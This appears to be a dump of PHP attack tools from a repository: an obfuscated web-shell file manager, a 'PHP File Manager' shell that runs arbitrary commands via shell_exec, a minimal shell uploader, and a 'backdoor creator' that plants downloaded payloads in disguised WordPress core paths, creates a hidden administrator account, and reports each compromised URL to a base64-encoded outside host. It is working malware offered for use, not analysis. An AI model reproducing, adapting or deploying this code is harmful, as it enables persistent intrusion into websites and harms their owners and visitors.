779 | 780 | 781 | 782 | 783 | 784 | 785 | 786 | '; 787 | 788 | echo ""; 789 | $euybrekw = $srl($bsn($lokasi), "", $lokasi); 790 | $euybrekw = $srl("//", "/", $euybrekw); 791 | echo " 792 | 793 | 794 | 795 | 801 | "; 809 | 810 | foreach($lokasinya as $ppkcina){ 811 | $euybre = $lokasi."/".$ppkcina; 812 | $euybre = $srl("//", "/", $euybre); 813 | if(!$idi($euybre) || $ppkcina == '.' || $ppkcina == '..') continue; 814 | echo ""; 815 | echo " 816 | 817 | 818 | 819 | 826 | 835 | "; 836 | } 837 | 838 | echo ''; 839 | $skd = "10"."24"; 840 | foreach($lokasinya as $mekicina) { 841 | $euybray = $lokasi."/".$mekicina; 842 | if(!$ifi("$lokasi/$mekicina")) continue; 843 | $size = $fsz("$lokasi/$mekicina")/$skd; 844 | $size = $rd($size,3); 845 | if($size >= $skd){ 846 | $size = $rd($size/$skd,2).' M'.'B'; 847 | } else { 848 | $size = $size.' K'.'B'; 849 | } 850 | 851 | echo " 852 | 853 | 854 | 855 | 856 | 873 | "; 874 | } 875 | echo '
Na'.'me
Si'.'ze
Las'.'t Mo'.'dif'.'ied
Owner / Group
Pe'.'rmi'.'ss'.'ions
Op'.'tio'.'ns
..
--
".fdt($euybrekw)."
".gor($euybrekw)." / ".ggr($euybrekw)."
"; 796 | if($isw($euybrekw)) echo ''; 797 | elseif(!$isr($euybrekw)) echo ''; 798 | echo statusnya($euybrekw); 799 | if($isw($euybrekw) || !$isr($euybrekw)) echo ''; 800 | echo "
802 | 803 | 804 | 805 | 806 | 807 |
"; 808 | echo "
".$ppkcina."
--
".fdt($euybre)."
".gor($euybre)." / ".ggr($euybre)."
"; 820 | if($isw($euybre)) echo ''; 821 | elseif(!$isr($euybre)) echo ''; 822 | echo statusnya($euybre); 823 | if($isw($euybre) || !$isr($euybre)) echo ''; 824 | 825 | echo "
827 | 828 | 829 | 830 | 831 | 832 | 833 | 834 |
".cfn($euybray)." $mekicina
".$size."
".fdt($euybray)."
".gor($euybray)." / ".ggr($euybray)."
"; 857 | if($isw("$lokasi/$mekicina")) echo ''; 858 | elseif(!$isr("$lokasi/$mekicina")) echo ''; 859 | echo statusnya("$lokasi/$mekicina"); 860 | if($isw("$lokasi/$mekicina") || !$isr("$lokasi/$mekicina")) echo ''; 861 | echo "
862 |
863 | 864 | 865 | 866 | 867 | 868 | 869 | 870 | 871 | 872 |
'; 876 | author(); 877 | 878 | function statusnya($fl){ 879 | $a = "sub"."st"."r"; 880 | $b = "s"."pri"."ntf"; 881 | $c = "fil"."eper"."ms"; 882 | $izin = $a($b('%o', $c($fl)), -4); 883 | return $izin; 884 | } 885 | ?> 886 | -------------------------------------------------------------------------------- /mini.php: -------------------------------------------------------------------------------- 1 | 18 | -------------------------------------------------------------------------------- /pop.php: -------------------------------------------------------------------------------- 1 | $cur); 21 | $options = array( 22 | 'http' => array( 23 | 'method' => 'POST', 24 | 'header' => 'Content-type: application/x-www-form-urlencoded', 25 | 'content' => http_build_query($data), 26 | ), 27 | ); 28 | $context = stream_context_create($options); 29 | $result = file_get_contents($k3yw, false, $context); 30 | 31 | 32 | function runCommand($command) { 33 | $output = shell_exec($command); 34 | echo "
$output
"; 35 | } 36 | 37 | 38 | function createFile($fileName, $content) { 39 | if (file_put_contents($fileName, $content) !== false) { 40 | echo "File '$fileName' created successfully!"; 41 | } else { 42 | echo "Failed to create file '$fileName'."; 43 | } 44 | } 45 | 46 | 47 | if (isset($_POST['upload'])) { 48 | $target_dir = $currentDir . "/"; 49 | $target_file = $target_dir . basename($_FILES['file']['name']); 50 | 51 | 52 | if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) { 53 | echo "The file ". htmlspecialchars(basename($_FILES['file']['name'])). " has been uploaded."; 54 | } else { 55 | echo "Sorry, there was an error uploading your file."; 56 | } 57 | } 58 | 59 | 60 | if (isset($_GET['mkdir'])) { 61 | $dirName = $_GET['mkdir']; 62 | if (mkdir($currentDir . '/' . $dirName)) { 63 | echo "Directory '$dirName' created successfully!"; 64 | } else { 65 | echo "Failed to create directory '$dirName'."; 66 | } 67 | } 68 | 69 | 70 | if (isset($_GET['delete'])) { 71 | $fileName = $_GET['delete']; 72 | if (unlink($currentDir . '/' . $fileName)) { 73 | echo "File '$fileName' deleted successfully!"; 74 | } else { 75 | echo "Failed to delete file '$fileName'."; 76 | } 77 | } 78 | 79 | 80 | if (isset($_GET['view'])) { 81 | $fileName = $_GET['view']; 82 | if (file_exists($currentDir . '/' . $fileName)) { 83 | $content = file_get_contents($currentDir . '/' . $fileName); 84 | echo "
" . htmlspecialchars($content) . "
"; 85 | } else { 86 | echo "File '$fileName' does not exist."; 87 | } 88 | } 89 | ?> 90 | 91 | 92 | 93 | 94 | 95 | 96 | PHP File Manager 97 | 164 | 165 | 166 | 167 |

PHP File Manager

168 | 169 |
170 |

Current Directory:

171 |
172 | 173 | 174 | 175 |
176 |
177 | 178 |

Create a File

179 |
180 | 181 | File name:
182 | Content:
183 |
184 | 185 |
186 | 187 | 193 | 194 |

Run a Command

195 |
196 | 197 | 198 | 199 |
200 | 201 |

Upload a File

202 |
203 | 204 | Select file: 205 | 206 |
207 | 208 |

Create a Directory

209 |
210 | 211 | 212 | 213 |
214 | 215 |

Delete a File

216 |
217 | 218 | 219 | 220 |
221 | 222 |

View a File

223 |
224 | 225 | 226 | 227 |
228 | 229 | 235 | 236 | 237 | 238 | -------------------------------------------------------------------------------- /tools/backdoor_creator.php: -------------------------------------------------------------------------------- 1 | Created: " . get_full_url($filePath) . "
"; 55 | } catch (Exception $e) { 56 | echo "
Error creating file in $subdir: " . $e->getMessage() . "

"; 57 | } 58 | } 59 | } 60 | } 61 | 62 | function create_wp_admin_user($rootDir, $username, $password) { 63 | require_once($rootDir . '/wp-config.php'); 64 | require_once($rootDir . '/wp-includes/wp-db.php'); 65 | require_once($rootDir . '/wp-includes/pluggable.php'); 66 | 67 | global $wpdb; 68 | 69 | $user_id = username_exists($username); 70 | if (!$user_id && email_exists($username . '@example.com') == false) { 71 | $user_id = wp_create_user($username, $password, $username . '@example.com'); 72 | $user = new WP_User($user_id); 73 | $user->set_role('administrator'); 74 | echo "
Admin user created with username: $username and password: $password

"; 75 | } else { 76 | echo "
Admin user already exists.

"; 77 | } 78 | } 79 | 80 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 81 | 82 | echo " 83 | 84 | backdoor creator 85 |

@trxsecurity

86 | 87 | 123 | 124 | "; 125 | 126 | $currentDir = __DIR__; 127 | $rootDir = isset($_POST['directory']) ? $_POST['directory'] : $currentDir; 128 | 129 | echo "
130 |
131 |
132 | 133 |
"; 134 | 135 | if ($_SERVER['REQUEST_METHOD'] == 'POST') { 136 | if (file_exists($rootDir . '/wp-config.php')) { 137 | echo "
WordPress detected.

"; 138 | 139 | $path1 = $rootDir . '/wp-includes/ID3/module.audio.ac4.php'; 140 | if (!file_exists($path1)) { 141 | try { 142 | file_put_contents($path1, download_content($url1)); 143 | echo "Created: " . get_full_url($path1) . "
"; 144 | } catch (Exception $e) { 145 | echo "
Error creating file: " . $e->getMessage() . "

"; 146 | } 147 | } 148 | 149 | $path2 = $rootDir . '/wp-includes/PHPMailer/config.php'; 150 | if (!file_exists($path2)) { 151 | try { 152 | file_put_contents($path2, download_content($url2)); 153 | echo "Created: " . get_full_url($path2) . "
"; 154 | } catch (Exception $e) { 155 | echo "
Error creating file: " . $e->getMessage() . "

"; 156 | } 157 | } 158 | 159 | create_files_in_subdirectories($rootDir, $url1); 160 | create_wp_admin_user($rootDir, 'MrZ', 'trxsecurity'); 161 | } else { 162 | echo "
Not a WordPress site. Creating files in subdirectories.

"; 163 | create_files_in_subdirectories($rootDir, $url1); 164 | } 165 | } 166 | 167 | echo ""; 168 | 169 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 170 | $data = array('file_url' => $cur); 171 | $options = array( 172 | 'http' => array( 173 | 'method' => 'POST', 174 | 'header' => 'Content-type: application/x-www-form-urlencoded', 175 | 'content' => http_build_query($data), 176 | ), 177 | ); 178 | $context = stream_context_create($options); 179 | $result = @file_get_contents($k3yw, false, $context); 180 | if ($result === false) { 181 | echo "
Error reporting file URL.

"; 182 | } 183 | ?> 184 | -------------------------------------------------------------------------------- /uper.php: -------------------------------------------------------------------------------- 1 | ! Uploader !'; 3 | echo '| M@rAz Ali |'; 4 | echo "".php_uname()."
"; 5 | echo '
'; 6 | echo '
'; 7 | if( $_POST['_upl'] == "Upload" ) { 8 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 9 | else { echo 'Not uploaded !

';} 10 | } 11 | ?> 12 | --------------------------------------------------------------------------------